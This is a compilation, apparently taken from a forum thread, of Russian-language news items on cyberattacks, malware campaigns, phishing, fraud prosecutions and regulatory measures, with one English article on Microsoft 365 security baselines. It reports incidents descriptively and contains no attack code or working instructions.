Как оказалось, атакующие пытались внедрить бэкдор в кодовую базу PHP. Если бы вредоносный код попал в рабочую среду, он позволил бы злоумышленникам выполнять собственные команды на серверах жертв. К счастью, вредоносные коммиты не продержались в коде и нескольких часов: их оперативно заметили и удалили. К тому же, в качестве меры предосторожности специалисты по сопровождению PHP приняли решение полностью перенести официальный репозиторий на GitHub, а поддержку git.php.net пообещали прекратить.
Как теперь сообщил Никита Попов, версию компрометации git.php.net, которой специалисты придерживались ранее, уже исключили. Теперь рассматривается версия утечки пользовательской БД с master.php.net. Дело в том, что расследование показало, что коммиты были отправлены с использованием HTTPS и аутентификации на основе пароля, поэтому возникло предположение о компрометации БД master.php.net.
«Git.php.net (намеренно) поддерживает продвижение изменений не только через SSH (с использованием инфраструктуры Gitolite и криптографии с открытым ключом), но и через HTTPS. Последний не использовал Gitolite, а вместо этого использовал git-http-бэкэнд с аутентификацией Apache 2 Digest в пользовательской БД master.php.net, — пишет Попов. — Примечательно, что злоумышленник всего за несколько попыток подобрал имена пользователей и успешно прошел аутентификацию после того, как был подобран верный username. Хотя у нас нет никаких конкретных доказательств, возможное объяснение заключается в том, что утекла база данных master.php.net. Хотя в таком случае непонятно, зачем злоумышленнику понадобилось подбирать имена пользователей».
Click to expand...
В итоге разработчики перенесли master.php.net на новую систему main.php.net с поддержкой TLS 1.2, а также сбросили все существующие пароли, и теперь пароли будут храниться с использованием bcrypt вместо MD5.
Источник: xakep.ru/2021/04/08/master-php-net/
В прошлом году, готовясь к окончательному прекращению поддержки Adobe Flash Player, компания Microsoft создала обновление KB4577586, предназначенное для удаления Adobe Flash из всех версий Windows 8, 10 и Windows Server, а также предотвращения его повторной установки на устройстве.
Тогда обновление доступно только через официальный каталог и его нельзя было удалить после установки. Впрочем, обновление не являлось обязательным.
В компании обещали, что в начале 2021 года обновление распространят через WSUS и Windows Update. Теперь Microsoft претворила эти планы в жизнь, и пользователи Windows 10 сообщают, что KB4577586 принудительно устанавливается на устройства (без предварительного уведомления) и окончательно удаляет Flash из системы.

То есть тем, кто захочет установить Adobe Flash Player на устройстве с этим обновлением, придется выполнить сброс системы до более ранней точки восстановления или установить свежую копию Windows 10.
Похоже, глядя на казусы, которые возникают из-за неработающего Flash (например, в Китае и Южной Африке), в Microsoft решили поскорее избавить пользователей от любого, связанного с Flash кода.
Источник: xakep.ru/2021/02/18/kb4577586/
Новая крупномасштабная кампания по распространению вредоносного ПО Lumma (класса «инфостилер») через фальшивые страницы с капчей была выявлена исследователями из Guardio Labs и Infoblox. Злоумышленники используют «малвертайзинг» — намеренное размещение вредоносных рекламных объявлений, которые эксплуатируют уязвимости в цифровой рекламной экосистеме. В результате тысячи жертв подвергаются риску кражи учётных данных и финансовых потерь.
Согласно данным исследования, кампания опирается на рекламную платформу Monetag (дочернюю структуру PropellerAds) для распространения фальшивых страниц с капчей. Пользователи сталкиваются с этими поддельными страницами при просмотре внешне безобидных сайтов, где им предлагается подтвердить личность, пройдя проверку «Я не робот».
Однако при выполнении этого действия в фоновом режиме запускается PowerShell- скрипт, устанавливающий вредоносное ПО. Программа нацелена на кражу чувствительных данных: логинов от социальных сетей, банковской информации и личных файлов.
Ключевые выводы исследования:
Роль рекламных сетей
В Guardio Labs отмечают, что инфраструктура рекламных сетей, подобных Monetag,
способствует подобным кампаниям. Рекламные скрипты Monetag применяют системы
распределения трафика (TDS), анализирующие посетителей и оптимизирующие
размещение объявлений. Эти механизмы, изначально предназначенные для
легитимной рекламы, используются для массового распространения вредоносного
контента.
Малвертайзинговые кампании процветают благодаря размытости зон ответственности. Рекламные сети, трекинговые сервисы, издатели сайтов и хостинг-провайдеры по отдельности играют определённую роль, но зачастую уклоняются от прямой ответственности. Злоумышленники пользуются этими «белыми пятнами», сначала согласовывая безобидный креатив, а затем подменяя его на вредоносный.
Подробнее о борьбе с малвертайзингом читайте в рекомендациях NCSC: “NCSC Publishes Tips to Tackle Malvertising Threat”.
«Эта кампания с поддельными капчами — лишь один пример, демонстрирующий теневую сторону рекламной экосистемы интернета, — предупреждают в Guardio Labs. — Пока реклама остаётся краеугольным камнем современного интернета, сама рекламная экосистема сталкивается с серьёзным конфликтом интересов, создающим брешь в безопасности и ставящим под угрозу пользователей».
После публикации расследования Monetag и BeMob предприняли меры, заблокировав более 200 учётных записей, связанных с кампанией. Тем не менее, эксперты подчёркивают необходимость упреждающих мер, таких как постоянная модерация контента и более строгая валидация аккаунтов, чтобы предотвратить новые злоупотребления.
Сотрудничество правоохранителей и регуляторов показывает пример глобального противодействия кибератакам.
Британский регулятор ICO и спецслужба NCA заключили меморандум о взаимопонимании (Memorandum of Understanding, MoU), направленный на укрепление киберустойчивости организаций по всей стране. Документ определяет, как оба ведомства будут сотрудничать для повышения защиты бизнеса и госучреждений от киберпреступников, занимающихся кражей данных и вымогательством.
Основной задачей соглашения является усиление обмена актуальной информацией в области кибербезопасности и предоставление организациям рекомендаций по эффективной защите данных и реагированию на киберугрозы. В рамках сотрудничества ICO и NCA намерены направлять компании к соответствующим структурам, таким как Национальный центр кибербезопасности (NCSC), чтобы те могли оперативно сообщать о кибератаках.
В ICO подчеркнули, что новый меморандум укрепляет существующее партнерство с NCA и способствует повышению стандартов безопасности, при этом каждое ведомство сохраняет свою зону ответственности.
Со своей стороны, NCA указало на важность поддержки и информирования уязвимых организаций и подчеркнуло, что заключенное соглашение является важным шагом к созданию более защищенной киберсреды в Великобритании.
Соглашение закрепляет ключевые обязательства сторон. В частности, ICO и NCA будут способствовать тому, чтобы организации своевременно взаимодействовали с NCA по вопросам кибербезопасности и реагировали на инциденты. При этом информация, переданная NCA на конфиденциальной основе, не будет передаваться в ICO без согласия соответствующей организации.
Кроме того, стороны договорились об анонимном обмене данными о киберинцидентах с целью защиты общественных интересов и предотвращения серьезных киберпреступлений. В случае, если обе организации окажутся вовлечены в расследование одного инцидента, они будут согласовывать действия, чтобы минимизировать возможные помехи и не мешать пострадавшим компаниям в работе по устранению последствий.
Меморандум также направлен на продвижение обучения в области кибербезопасности, предоставление единых рекомендаций и повышение стандартов безопасности во всех секторах. Сотрудничество ICO и NCA должно укрепить киберзащиту Великобритании и сделать ее менее уязвимой для атак злоумышленников.
ico.org.uk/about-the-ico/media-centre/news-and-blogs/2024/09/ico-and-nca-sign-
memorandum-of-understanding-for-further-collaboration-on-cyber-security/
ico.org.uk/media/about-the-ico/mou/4030961/ico_nca_mou.pdf
Прокурором Антроповского района поддержано государственное обвинение по уголовному делу в отношении 19-летнего местного жителя. Он признан виновным в совершении двух преступлений, предусмотренных ч. 2 ст. 273 УК РФ (неправомерное распространение вредоносных компьютерных программ).
Судом установлено, что осужденный, в период с марта 2022 по январь 2023 года, распространял в сети «Интернет» вредоносное программное обеспечение «RedlineStealer» и «RaccoonStealer» для похищения регистрационных данных пользователей (файлы, логины, пароли), путем размещения информации в виде поддельной (фишинговой) рекламной ссылки для скачивания (URL-upec), замаскированной под законный источник.
В результате его преступных действий, пользователи сети «Интернет» осуществляли переход по поддельной рекламе, получали скрытое «заражение» вредоносным программным обеспечением, а осужденный, незаконно получал их регистрационные данные (логины и пароли) в сети «Интернет», которые впоследствии продавал.
Вину в совершении инкриминируемых ему преступлений мужчина признал полностью.
Приговором суда, с учетом личности подсудимого, степени тяжести совершенных преступлений, ему назначено наказание в виде ограничения свободы сроком на 1 год с возложением дополнительных обязанностей.
Обвиняемого в мошенничестве на более чем 270 млн рублей россиянина депортировали из Турции в Россию. Самолет с депортируемым мужчиной на борту приземлился в аэропорту Внуково, где мужчину задержали российские правоохранители. Об этом сообщила официальный представитель МВД Ирина Волк.
Обвиняемого в мошенничестве россиянина депортировали из Турции.
"Сегодня в Москве на территории аэропорта Внуково им. А.Н. Туполева сотрудниками НЦБ Интерпола МВД России и Линейного отдела МВД России в аэропорту Внуково был задержан депортированный из Турецкой Республики россиянин Марат Джанибеков"
Click to expand...
Отмечается, что задержание провели благодаря взаимодействию российских полицейских с представителями турецких правоохранительных органов Турецкой Республики.
Мужчина обвиняется в мошенничестве, совершенном группой лиц по предварительному сговору в особо крупном размере. Также задержанному инкриминируют легализацию криминальных доходов.
По версии следствия, Джанибеков, будучи в сговоре с другими соучастниками и использовав служебное положение, похитил деньги ПАО "Россети".
"Бюджету Российской Федерации был причинен ущерб на сумму более 272 млн рублей. Похищенные деньги с помощью фиктивных финансовых операций были легализованы", – говорится в сообщении министерства.
Мужчина скрылся за границей в ноябре 2021 года. Его объявили в международный розыск по каналам Интерпола.
sc: t.me/mediamvd/26428
В Красноярском крае суд вынес приговор 48-летнему жителю города Зеленогорска,
который помог телефонным мошенникам похитить у семи пожилых женщин в возрасте
от 69 до 87 лет в общей сумме свыше 1,3 млн рублей.
Обвинение в совершении преступлений, предусмотренных статьёй 159 Уголовного
кодекса Российской Федерации, фигуранту было предъявлено следователями ОМВД
России по ЗАТО г. Зеленогорск.
В ходе расследования было установлено, что летом текущего года мужчина 1975
года рождения в сети Интернет откликнулся на объявление аферистов, действующих
по мошеннической схеме «Ваш родственник попал в ДТП», о работе курьером.
По указке злоумышленников он приходил по адресам проживания уже обманутых по
телефону пенсионерок и забирал у них сбережения. Похищенную наличность он
переводил нанимателям, оставляя себе вознаграждение. Фигурант был задержан
сотрудниками полиции в городе Красноярске возле подъезда жилого дома, где
проживала одна из потерпевших.
У него были изъяты квитанции о переводе денежных средств и личные вещи пожилых граждан, которые те передавали для якобы пострадавших в дорожных авариях родственников. Изучив материалы уголовного дела, суд признал зеленогорца виновным в инкриминируемых преступлениях и назначил ему лишение свободы сроком на 7 лет и 6 месяцев с отбыванием наказания в исправительной колонии общего режима. Также он должен будет возместить причинённый ущерб.
Обнаружен новый троян удаленного доступа (RAT), который продается через Telegram и Discord. Доступ к QwixxRAT предлагается всего за 150 рублей в неделю и 500 рублей за пожизненную лицензию, а также вредонос имеет ограниченную бесплатную версию.
Аналитики [Uptycs](https://www.uptycs.com/blog/remote-access-trojan-qwixx- telegram) пишут, что на машинах под управлением Windows QwixxRAT может похищать конфиденциальные данные, которые затем передаются Telegram-боту злоумышленников.
По словам исследователей, RAT представляет собой «тщательно разработанное» решение для сбора таких данных, как история браузера, закладки, файлы cookie, информация о банковских картах, а также кейлоггинга, снимков экрана, файлов, соответствующих определенным расширениям, и данных из таких приложений, как Steam и Telegram.
Spoiler: спойлер
[](https://xakep.ru/wp- content/uploads/2023/08/433133/tele.jpg)
Бинарник вредоноса основан на C#, и QwixxRAT обладает различными функциями,
которые позволяют ему оставаться незамеченным и избегать обнаружения.
Например, вредонос умеет «засыпать», чтобы задержать процесс выполнения, а
также проводит проверки, чтобы определить, не работает ли он в песочнице или
виртуальной среде.
Код QwixxRAT
Spoiler: исходник
[](https://xakep.ru/wp- content/uploads/2023/08/433133/Fig3.jpg)
Кроме того, QwixxRAT может отслеживать определенный список процессов (например, taskmgr, processhacker, netstat, netmon, tcpview и wireshark), при обнаружении которых он останавливает свою деятельность до тех пор, пока опасный процесс не будет завершен.
Также отмечается, что в QwixxRAT встроен клиппер, который незаметно получает доступ к конфиденциальной информации в буфере обмена устройства и, благодаря этому, малварь может осуществлять переводы криптовалюты в кошельки злоумышленников.
Как уже было упомянуто выше, управление малварью осуществляется через Telegram-бота, который отправляет вредоносу команды для сбора дополнительных данных (например, запись аудио или видео с веб-камеры) и может использоваться даже для удаленного отключения или перезапуска зараженного хоста.
США учли свои предыдущие ошибки и выпустили новые правила киберзащиты.
Администрация транспортной безопасности (Transportation Security Administration, TSA) [выпустила](https://www.tsa.gov/sites/default/files/tsa- sd-pipeline-2021-02d-w-memo_07_27_2023.pdf) обновленные нормативы по кибербезопасности для компаний, эксплуатирующих трубопроводы опасных жидкостей, природного газа и объекты по работе со сжиженным природным газом (СПГ).
Первоначально регламенты были введены в 2021 году после кибератаки на Colonial Pipeline , которая привела к нехватке бензина на Восточном побережье США. В мае 2022 года TSA обновила руководящие принципы после истечения срока действия.
Обновлённые правила включают некоторые корректировки, но в основном повторяют предыдущие нормативы. В целом, изменения направлены на закрытие пробелов в регулировании и предоставление операторам большей гибкости в отношении защиты объектов.
Основная часть директивы осталась неизменной. Компании должны уведомить TSA о проведении ряда мер по кибербезопасности, включая разработку плана реагирования на инциденты, создание должности ответственного лица по кибербезопасности, сканирование уязвимостей, сегментацию сетей и многое другое.
Согласно новым правилам, операторы должны ежегодно представлять:
Эксперты по кибербезопасности трубопроводов подчеркнули, что директива также содержит ряд незначительных обновлений, преимущественно связанных с обязательством операторов уведомлять TSA об изменениях в их планах или эксплуатации трубопроводов.
Обновление также предоставляет владельцам и операторам возможность использовать различные отраслевые стандарты, NIST Cybersecurity Framework и серия стандартов ISA/IEC 62443 для автоматизации и систем контроля промышленности (Industrial Control System, ICS).
Заключенный одной из австралийских тюрем, украл $2 млн у своих сокамерников, убедив их, что сможет увеличить предоставленный ему капитал, вложившись в биткоин. Одной из жертв стал знаменитый австралийский регбист.
Ишан Синар Саппидин, в настоящее время отбывающий 12-летний тюремный срок за обман челнов своей семьи и друзей на сумму 4,6 миллиона долларов посредством вовлечения их в участие в финансовых пирамидах, предположительно убедил по меньшей мере шестерых заключенных, включая звезду австралийского регби, Джаррида Хейна, перевести более 2 миллионов долларов на подконтрольные ему счета в период с 2020 по 2022 год.
Для убеждения других заключенных Саппидин рассказал, что имел большой опыт работы вместе с австралийским миллиардером Майком Кэннон-Бруксом в инвестиционной компании, для клиентов которой он смог заработать 290 миллионов долларов. При этом нет никаких доказательств причастности Кэннона-Брукса к предполагаемой мошеннической деятельности Саппидина.
Также сообщается, что из-за отсутствия у заключенных доступа в Интернет, они обратились к третьим лицам за пределами тюрьмы для перевода средств мошеннику. После получения средств он хвастался значительными доходами, которых ему удалось достичь благодаря инвестициям в биткоин. На деле же жертвы мошеннической схемы больше не увидели своих средств.
Власти страны начали расследование по этому делу, а Саппидин был переведен из тюрьмы города Кумы, на юго-востоке страны, в другую тюрьму после того, как возникли вопросы о его предполагаемых финансовых операциях.
«В начале этого года сотрудникам Исправительных служб Нового Южного Уэльса (Corrective Services New South Wales, CSNSW) стало известно о том, что один из заключенных исправительного центра Кума пытался убеждать своих сокамерников совершать сделки на финансовых рынках», — заявила представитель CSNSW.
«По обвиняемому заключенному ... с тех пор была пересмотрена классификация безопасности, чтобы обеспечить более высокий уровень надзора за ним и меньшую свободу действий. CSNSW передает информацию о его преступной деятельности в отдел полицейской разведки исправительных учреждений, который обменивается данными с полицией соответствующего штата и федеральной полицией».
Саппидин уже не первый раз попадается преступлении закона. Помимо приговора, вынесенного ему в 2018 году за махинации с финансовыми пирамидами, он был заключен в тюрьму в 2005 году за аналогичное преступление, связанное с мошенничеством. А в 2014 году Австралийская комиссия по ценным бумагам и инвестициям (ASIC) запретила Саппидину оказывать финансовые услуги после того, как он украл у инвесторов 500 000 долларов. В то время Саппидин утверждал клиентам, что у него есть доступ к публичному размещению акций Facebook. В 2001 году Саппидин – тогда студент юридического факультета – был обязан отработать 250 часов общественных работ после того, как признал себя виновным в краже 60 000 долларов у своего тогдашнего работодателя.
Джаррид Хейн, 35-летний бывший игрок Австралийской регбийной лиги, познакомился с Ишаном Саппидином, который украл в итоге у спортсмена 780 000 долл. США, в тюрьме Кумы, в которую попал после того, как был признан виновным в сексуальном насилии над женщиной в 2018 году. По версии прокуратуры он напал на 26-летнюю женщину в ее доме и подверг сексуальному насилию в спальне. При этом сам Хейн отвергает обвинения и заявляет, что секс был по обоюдному согласию.
source: dailymail.co.uk/sport/nrl/article-12228675/Fallen-NRL-star-Jarryd- Hayne-allegedly-loses-780K-duped-inmate-Bitcoin-scam.html
На Урале троих Олегов осудят за попытку взорвать банкомат с помощью газа ради кражи денег.
В Свердловской области троих жителей Среднего Урала осудят за попытку взорвать банкомат и украсть из него 1,3 миллиона рублей. Об этом сообщили в прокуратуре региона.
По данным надзорного ведомства, инцидент произошел в октябре 2022 года в поселке Горноуральский. Группа злоумышленников взломала дверь магазина, проникла внутрь и попыталась забрать из банкомата более миллиона рублей. Как ранее рассказал пресс-секретарь регионального главка МВД Валерий Горелых, троих преступников звали Олегами.
Чтобы извлечь деньги, мужчины взяли с собой кирку, газовый баллон, заправленный пропаном, электрический провод, скрепленный со спичкой и изолентой и угловую шлифовальную машину.
Однако подорвать баллон им так и не удалось. При этом в помещении сработала сигнализация. Тогда сообщники забрали из кассы магазина, в котором находился банкомат, три тысячи рублей, после чего сбежали, оставив на месте все вещдоки. Это помогло оперативникам выйти на след грабителей. Выяснилось, что мужчины работали на стройке в Екатеринбурге. Ранее они были судимы по разным статьям.
Их поместили в СИЗО. Дело будет рассмотрено в Пригородном районном суде.
Получив ключи, полицейские просто отозвали платежи, которые злоумышленники требовали в качестве выкупа.
Национальная полиция Нидерландов в сотрудничестве со специалистами ИБ-компании Responders.NU обманом выманила у операторов шифровальщика DeadBolt 155 ключей для дешифровки данных. Для этого полицейские платили злоумышленникам, получали ключи, а затем отзывали платежи.
Атаки с использованием DeadBolt начались в январе 2022 года. В качестве целей для кибератак операторы шифровальщика выбирают NAS различных производителей, но чаще всего под их удар попадают устройства от QNAP.
По данным голландской полиции, злоумышленники успели взломать более 20 000 устройств по всему миру и не менее 1000 в Нидерландах. С каждой жертвы вымогатели требуют по 0,03 биткоина (около $576 по текущему курсу).
Эксперты рассказали, что после выплаты выкупа DeadBolt направляет биткоин- транзакцию на адрес, используемый для выплаты выкупа. Эта транзакция содержит ключ для дешифрования данных жертвы, который можно найти в OP_RETURN.
Когда жертва предоставляет ключ, он преобразуется в хэш SHA256 и сравнивается с хэшем SHA256 мастер-ключа DeadBolt. Если ключ дешифрования совпадает с одним из хэшей SHA256, зашифрованные файлы на зараженном устройстве расшифровываются.
"Полиция заплатила выкуп, получила ключи дешифрования, а затем отозвала платежи. Собранные ключи позволяют разблокировать такие файлы, как ценные фотографии или административные данные, не тратя денег пострадавших", – говорится в пресс-релизе полицейских.
По словам Рики Геверса, эксперта из Responders.NU, киберпреступники быстро раскрыли уловку правоохранителей, которые успели собрать 155 ключей. Эти ключи помогут 90% жертв, обратившихся в органы.
Раз вымогатели раскрыли уловку, больше их так обмануть не удастся. Операторы DeadBolt уже поменяли принцип и требуют двойное подтверждение, прежде чем жертва получит ключ расшифровки.
Эксперты Trustwave SpiderLabs предупреждают о новой уловке фишеров: на одном
из сайтов-ловушек обнаружен чат-бот, который шаг за шагом выманивает у
посетителей целевую информацию. Использование интерактивного элемента придает
больше убедительности фальшивке; с той же целью злоумышленники имитируют
CAPTCHA и прием платежей с двухфакторной аутентификацией (2FA).
Атака, как обычно, начинается с фишингового письма — в данном случае с
извещения DHL о проблемах с доставкой. Анализ email-заголовков показал, что в
строке From: отсутствует адрес отправителя.
Нажатие кнопки, вставленной в тело письма, инициирует запуск браузера и
загрузку PDF-файла со ссылками на фишинговый сайт. Этот трюк призван ввести в
заблуждение email-защиту.
На сайте-ловушке посетителя приветствует виртуальный помощник. Это подобие
чат-бота обладает скромным набором реплик, его основная задача — завоевать
доверие потенциальной жертвы и заставить ее заполнить фишинговые формы.
Визитера просят подтвердить номер для отслеживания почтового отправления и
поясняют, что в ходе транспортировки стикер на бандероли был поврежден, в
результате доставка стала невозможной. Для достоверности чат-бот показывает
фото некой бандероли, предлагая предоставить недостающие данные и оплатить
повторное оформление мелкого пакета, которое придется выполнить вручную.
Если адресат согласен на изменение сроков доставки и кликнет по предложенной кнопке, ему покажут CAPTCHA — картинку, встроенную в HTML. Уловка тоже призвана создать иллюзию легитимности ресурса, но в отличие от чат-бота уже использовалась в атаках фишеров. Затем пользователя просят заполнить первую фишинговую форму — ввести учетные данные DHL (email и пароль) и предпочтительный адрес доставки.
После отправки этих сведений его перенаправляют на страницу Secure Pay, где требуется ввести данные платежной карты: имя владельца, номер, срок действия и код CVV. Аналитики заметили, что Secure Pay при этом проверяет правильность номера карты и пытается определить ее тип. По завершении процесса жертве через редирект отображается страница подтверждения транзакции с полем для ввода одноразового пароля, якобы высланного в виде СМС.
Примечательно, что номер телефона при этом не запрашивали, в формах фишеров эта строка отсутствует. Исследователи попробовали водить произвольные цифры, но им каждый раз сообщали, что время вода истекло, и возвращали на ту же страницу. Пятая попытка оказалась успешной — «код» с благодарностью приняли. Приведенный здесь образец фишингового письма был обнаружен 25 марта.
Сайт с чат-ботом все еще работает, но перенесен в другой домен — какой, эксперты не пишут. Прежний, 24mhd[.]com, явно не имел ничего общего с используемым брендом; в URL страниц, правда, имя DHL было вставлено, но с опечаткой в расчете на невнимательность пользователей— как dhi (см. список фишинговых ссылок в блог-записи SpiderLabs).
В протоколе Solana исправлена потенциальная ошибка, которая могла привести к краже $2,6 млрд.
Этот взлом был бы одним из самых крупных в истории криптовалют. Например, на сегодняшний день все приложения DeFi-сферы в эксплойтах потеряли около $2 млрд.
Из-за уязвимости в библиотеке протокола (SPL) взломщики получили бы возможность красть средства из проектов на этом блокчейне по $27 млн в час. Взлому могли подвергнуться такие проекты, как Tulip Protocol, Solend, Soda, Larix, имеющие миллиардную заблокированную сумму средств (TVL).
Ошибка была найдена в июне 2021 года. О ней написали на Github. Однако до декабря ее так и не решили. В ходе проверки потенциального риска удалось выяснить, что ошибка способна привести к краже средств посредством бесконечного числа крошечных транзакций.
Проблема состояла в неправильном округлении сумм транзакций. Дело в том, что вышеупомянутые приложения округляют суммы во время транзакций до ближайшего целого числа. В рамках использования этой ошибки злоумышленниками это бы привело к краже целого состояния.
Оказалось, что ошибку можно вызвать до 150-200 раз за один перевод средств, и это привело бы к краже денег из пулов в размере 7500 долларов за одну секунду. К счастью, исследователям удалось убедить разработчиков Solana Labs внести необходимые исправления в библиотеку SPL.
https://www.bleepingcomputer[.]com/...-back-and-rebuilding-its-botnet-via- trickbot/
У техасской GOP зияющая дыра в их системе С 20-м 9/11 #Аноним наносит ущерб
сайту GOP. #OperationJane #ExpectUsTexas
Texasgop.org
Microsoft has updated the security baseline for Microsoft 365 Apps for enterprise (formerly Office 365 Professional Plus) to include protection from JScript code execution attacks and unsigned macros.
[Security baselines](https://docs.microsoft.com/en-us/windows/security/threat-
protection/windows-security-configuration-framework/windows-security-
baselines) enable security admins to use Microsoft-recommended Group Policy
Object (GPO) baselines to reduce the attack surface of Microsoft 365 Apps and
boost the security posture of enterprise endpoints they run on.
"A security baseline is a group of Microsoft-recommended configuration
settings that explains their security impact," as Microsoft
[explains](https://docs.microsoft.com/en-us/windows/security/threat-
protection/windows-security-configuration-framework/windows-security-
baselines).
"These settings are based on feedback from Microsoft security engineering teams, product groups, partners, and customers."
The highlights of the new recommended security configuration baseline settings for Microsoft 365 Apps for enterprise, version 2104, include protection against remote code execution attacks by restricting legacy JScript execution for Office.
JScript is a legacy Internet Explorer component that, although replaced by JScript9, is still being used by business-critical apps in enterprise environments.
Additionally, admins are also advised to extend macro protection by enabling a GPO to require application add-ins to be signed by trusted publishers and disable them silently by blocking them and turning off Trust Bar notifications.
The GPOs that need to be enabled to implement these baseline recommended security settings are:
Other new policies added to the baseline since last year's release include:
"Most organizations can implement the baseline's recommended settings without any problems. However, there are a few settings that will cause operational issues for some organizations," Microsoft [said](https://techcommunity.microsoft.com/t5/microsoft-security- baselines/security-baseline-for-microsoft-365-apps-for- enterprise-v2104/ba-p/2307695).
"We've broken out related groups of such settings into their own GPOs to make it easier for organizations to add or remove these restrictions as a set.
"The local-policy script (Baseline-LocalInstall.ps1) offers command-line options to control whether these GPOs are installed."
The final release of the security baseline for Microsoft 365 Apps for enterprise is available for download via the Microsoft Security Compliance Toolkit.
It includes "importable GPOs, a script to apply the GPOs to local policy, a script to import the GPOs into Active Directory Group Policy."
Microsoft also provides all the recommended settings in spreadsheet form, together with an updated custom administrative template (SecGuide.ADMX/L) file and a Policy Analyzer rules file.
Future security baselines will be aligned with semi-annual channel releases of Microsoft 365 Apps for enterprise every June and December.
Полиция Дели арестовала нескольких организаторов мошеннической криптовалютной схемы под названием M/s Goldcoat Solar и конфисковала у них более 100 000 стейблкоинов USDT.
По данным прокуратуры, преступники выдавали себя за высокопоставленных индийских чиновников. Они ложно заявляли, что реализуют программу Министерства энергетики Индии по расширению солнечной энергетики до 450 гигаватт (ГВт) к 2030 году. Аферисты делали упор на развитие возобновляемых источников энергии. Они обманули множество инвесторов, которые согласились вложить деньги в государственный энергетический план.
Организаторы M/s Goldcoat Solar распространяли объявления в соцсетях, называя свою схему законными инвестициями. Чтобы завоевать доверие инвесторов, жертвам показывали сфабрикованные скриншоты с доходами предыдущих вкладчиков. Мошенники выводили полученные деньги через банки, при этом часть средств конвертировалась в криптовалюту.
Полиции удалось изъять у преступников 100 000 USDT. Правоохранительные органы смогли отследить средства и вычислить преступников с помощью криптобиржи Binance. Руководитель отдела по обучению сотрудников правоохранительных органов в Binance Ярек Якубчек (Jarek Jakubcek) заявил, что биржа готова и дальше сотрудничать с правоохранителями в поимке преступников.
Мошенник из Пенсильвании Энтони Фолк получил три года тюрьмы за мошенничество с криптовалютой.
Американский суд вынес приговор Антони Фолку, 26-летнему хакеру из Пенсильвании, который вместе со своими сообщниками обманывал владельцев криптовалюты и вымогал у них деньги. Фолк получил три года тюрьмы и должен заплатить почти три миллиона долларов компенсации своим жертвам. Кроме того, у него конфискуют активы, включая недвижимость, счета в банке и предметы роскоши, на общую сумму около $20 млн.
Схема мошенничества была основана на методе “SIM swapping” - переносе номеров телефонов жертв на SIM-карты в устройствах злоумышленников. Для этого они обманывали сотрудников мобильных операторов, используя различные приемы социальной инженерии. После того, как мошенники получали контроль над номерами, они взламывали электронные почты и другие аккаунты жертв, откуда переводили криптовалюту на свои кошельки. Иногда они также звонили жертвам и угрожали скомпрометировать еще больше аккаунтов, если те не заплатят им дополнительные деньги. Сообщается, что их преступная деятельность продолжалась с октября 2016 по май 2018 года.
Фолку придется заплатить $2 816 433 в качестве компенсации 11 жертвам. Суд также приказал конфисковать многочисленные активы, изъятые правительством, являющиеся или происходящие от доходов, полученных в результате преступления. Среди этих активов - дом стоимостью почти 1 миллион долларов в Пенсильвании, три счета в J.P. Morgan Chase на сумму около 12,5 миллиона, 6,2 миллиона и 18 тысяч долларов соответственно, автомобили Mercedes-Benz GTS, Nissan Rouge и Chevrolet Silverado K1500, бриллиантовые украшения, часы Rolex, серьги Tiffany и сумка с кошельком Louis Vuitton.
Два сообщника Фолка также были арестованы и обвинены в сговоре по мошенничеству и вымогательству. Их судебные процессы назначены на конец августа и начало октября 2023 года.
source: justice[.]gov/usao-ndca/pr/pennsylvania-resident-sentenced-three- years-prison-role-conspiracy-defraud-and-extort
Сотни поддельных мобильных приложений использовались киберпреступниками для слежки и сбора личных данных.
Полиция Гонконга совместно с Интерполом раскрыла деятельность международного фишингового синдиката, который использовал 563 поддельных мобильных приложения для слежки и кражи информации со смартфонов по всему миру.
По словам Раймонда Лам Чук-хо из бюро по борьбе с кибербезопасностью и технологическими преступлениями, полицейские также отследили 258 серверов по всему миру, которые были связаны с этими фишинговыми приложениями.
Операция под кодовым названием «Magicflame» была запущена в феврале 2022 года на фоне роста киберпреступности во всём мире. Некоторые жертвы потеряли свои последние сбережения после того, как хакеры украли их личные данные и обчистили банковские счета.
Лам Чук-хо рассказал, что вредоносные приложения выдавали себя за банки, медиаплееры, приложения для знакомств, камеры и т.д. Он сообщил, что 192 сервера из 258 находились в самом Гонконге, а киберпреступники использовали систему туннелирования, чтобы избежать обнаружения представителями правопорядка.
По данным полиции, хакеры отправляли фишинговые SMS-сообщения и просили получателей перейти по ссылке. Нажатие на ссылку вело к загрузке поддельных приложений на смартфоны жертв, что позволило хакерам на протяжении долгого времени красть личную информацию, такую как данные банковского счета, кредитной карты, телефонные контакты и фотографии.
Уилсон Фан Чун Ип из того же бюро, заявил, что преступники могли использовать украденные данные для перевода денег со счетов жертв и совершения покупок в Интернете. Он также сказал, что хакеры могли читать все текстовые сообщения и электронные письма, прослушивать аудиозаписи и отслеживать местоположение людей. Злоумышленники также не стеснялись в режиме реально времени подслушивать своих жертв через диктофон и тайно делать фотографии с камеры.
Расследование показало, что на серверах киберпреступников хранились персональные данные, украденные с 519 смартфонов, принадлежащих людям из разных стран, в основном из Японии и Южной Кореи. По словам полиции, ни одна из жертв не проживала в Гонконге.
«Мы считаем, что это был зарубежный синдикат, который использовал городскую интернет-сеть для осуществления своей незаконной деятельности», — сказал Лам Чук-хо.
В городе не было произведено никаких арестов, но полиция выявила некоторых подозреваемых и передала их информацию соответствующим зарубежным правоохранительным органам через Интерпол. «Мы считаем, что синдикат прекратил свои незаконные операции после обнаружения их деятельности», — добавил Лам Чук-хо.
В прошлом году полиция Гонконга раскрыла 473 фишинговых атаки, повлекшие финансовые потери в размере 8,9 млн гонконгских долларов (1,1 млн долларов США). За этот период было зарегистрировано 18 660 сообщений о киберпреступлениях, что значительно больше по сравнению с 13 160 случаями за аналогичный период 2021 года.
Полиция призвала общественность сохранять бдительность и избегать подключения к любым подозрительным веб-сайтам или мобильным приложениям через гиперссылки в электронных письмах или текстовых сообщениях, а также загружать мобильные приложения только из официальных магазинов.
Для борьбы с мошенничеством в Интернете и по телефону гонконгская полиция даже запустила отдельный сервис в сентябре прошлого года. Поисковая система «Scameter», доступная на веб-сайте CyberDefender, помогает пробивать подозрительные звонки, сообщения, запросы дружбы, фишинговые сайты и т.п., чтобы минимизировать риски нарваться на мошенников.
Можно ли загрузить исходный код форума и использовать ли форум CMS с открытым исходным кодом
За найденную уязвимость в российском электронном голосовании назначена награда
«Ростелеком» запустит 4-5 сентября технический тест для хакеров и всех желающих найти уязвимости в системе дистанционного электронного голосования (ДЭГ).
